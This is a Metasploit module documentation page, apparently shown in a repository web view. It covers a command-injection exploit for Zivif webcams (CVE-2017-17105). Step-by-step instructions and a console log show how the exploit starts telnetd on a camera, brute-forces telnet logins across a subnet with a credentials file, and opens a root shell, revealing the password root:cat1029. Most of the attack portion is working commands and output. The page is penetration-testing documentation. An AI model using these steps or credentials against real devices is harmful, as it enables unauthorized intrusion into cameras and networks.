adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
9beec65ef34c4e90a00a41ee1c8de0f9e6effd2a
metasploit-gs/documentation/modules/exploit/unix/http/zivif_ipcheck_exec.rb
T
Silas Cutler 5f29af114b Added documentation and set default payload
2020-06-15 15:51:28 -04:00

76 lines
2.6 KiB
Ruby
Raw Blame History

## Description
This module exploits a remote command execution vulnerability in Zivif webcams. This is known to impact versions prior to and including v2.3.4.2103. Exploit was reported in CVE-2017-17105.
This module has been tested successfully on version v2.3.4.2103 and V4.7.4.2121.
## Vulnerable Application
Unfortunately a virtual copy of this camera is not avaiable.
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploit/unix/http/zivif_ipcheck_exec`
3. Do: `set rhost [IP]`
4. Do: `set PAYLOAD payload/cmd/unix/generic`
5. Do: `set CMD telnetd`
6. Do: `exploit`
7. Port 23 will now be open on the target
## Scenarios
```
msf5 > use exploit/unix/http/zivif_ipcheck_exec
msf5 exploit(unix/http/zivif_ipcheck_exec) > set rhost 192.168.0.35
rhost => 192.168.0.35
msf5 exploit(unix/http/zivif_ipcheck_exec) > set PAYLOAD payload/cmd/unix/generic
PAYLOAD => cmd/unix/generic
msf5 exploit(unix/http/zivif_ipcheck_exec) > set CMD telenetd
CMD => telenetd
msf5 exploit(unix/http/zivif_ipcheck_exec) > exploit
[*] Sending request
[+] Command sent successfully
[*] Exploit completed, but no session was created.
msf5 exploit(unix/http/zivif_ipcheck_exec) >
msf5 exploit(unix/http/zivif_ipcheck_exec) > back
msf5 > use auxiliary/scanner/telnet/telnet_login
msf5 auxiliary(scanner/telnet/telnet_login) > set RHOSTS 192.168.0.0/24
RHOSTS => 192.168.0.0/24
msf5 auxiliary(scanner/telnet/telnet_login) > set USERPASS_FILE /root/creds
USERPASS_FILE => /root/creds
msf5 auxiliary(scanner/telnet/telnet_login) > set threads 10
threads => 10
msf5 auxiliary(scanner/telnet/telnet_login) > exploit
[!] 192.168.0.34:23 - No active DB -- Credential data will not be saved!
[+] 192.168.0.34:23 - 192.168.0.34:23 - Login Successful: root:cat1029
[*] 192.168.0.34:23 - Attempting to start session 192.168.0.34:23 with root:cat1029
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.0.34:23) at 2020-06-15 19:47:14 +0000
[-] 192.168.0.34:23 - 192.168.0.34:23 - LOGIN FAILED: admin:cat1029 (Incorrect: )
[*] 192.168.0.34:23 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/telnet/telnet_login) >
msf5 auxiliary(scanner/telnet/telnet_login) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell TELNET root:cat1029 (192.168.0.34:23) 0.0.0.0:0 -> 192.168.0.34:23 (192.168.0.34)
msf5 auxiliary(scanner/telnet/telnet_login) >
```
Reference in New Issue View Git Blame Copy Permalink